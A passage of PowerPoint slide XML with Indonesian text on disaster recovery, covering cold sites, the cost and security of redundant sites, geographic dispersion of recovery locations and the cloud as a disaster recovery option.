              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cold site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kosong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan mahal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>duplikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggandakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DR). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terletak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> regional, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>strategis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (DR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjangkau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
